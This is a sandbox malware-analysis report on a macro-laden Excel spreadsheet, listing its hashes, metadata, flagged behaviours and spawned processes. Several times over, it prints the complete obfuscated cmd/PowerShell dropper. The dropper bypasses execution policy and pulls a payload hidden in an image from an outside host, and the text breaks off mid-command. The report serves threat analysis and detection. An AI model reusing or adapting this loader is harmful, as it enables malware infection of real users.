analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

doc_SPA_(25)_(2019-03-18 n._776).xls

Full analysis: https://app.any.run/tasks/6cd6b43d-b6b8-4ed4-a340-9dae0a23ff6c
Verdict: Malicious activity
Analysis date: March 21, 2019, 10:31:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: copy; utente, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Mar 7 12:12:20 2019, Last Saved Time/Date: Mon Mar 11 08:22:01 2019, Security: 0
MD5:

E10595514FBD9225D4D3BB01470BF1E1

SHA1:

5E7A99894AC4FBA1E1755F076A4ED3A8B4706304

SHA256:

B1A0CC703BED0F205830881B98CC4803D8B6E37F5918B231CBE91F4CC7E16547

SSDEEP:

1536:wn1DN3aMePUKccCEW8yjJTdrBX/3t4k3hOdsylKlgryzc4bNhZFGzE+cL4LgldAC:wn1DN3aM+UKccCEW8yjJTdrBX/3t4k3q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3264)
      • cmd.exe (PID: 2508)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2644)
      • cmd.exe (PID: 3072)
      • cmd.exe (PID: 3864)
      • cmd.exe (PID: 2252)
    • Creates files in the user directory

      • powershell.exe (PID: 3472)
      • powershell.exe (PID: 2592)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2952)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: copy; utente
Software: Microsoft Excel
CreateDate: 2019:03:07 12:12:20
ModifyDate: 2019:03:11 08:22:01
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Microsoft
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: 2019'marzo
HeadingPairs:
  • Worksheets
  • 1
CompObjUserTypeLen: 31
CompObjUserType: Microsoft Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
13
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe csc.exe cvtres.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe csc.exe cvtres.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2644cmd /cCMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(^&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(^&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(^&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(^&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(^&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(^&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(^&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( ^& "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3072CMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( & "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3264CMd /C %trs%C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3472PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2848"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\lcupnu2x.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
476C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES6678.tmp" "c:\Users\admin\AppData\Local\Temp\CSC6677.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3864cmd /cCMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(^&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(^&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(^&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(^&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- 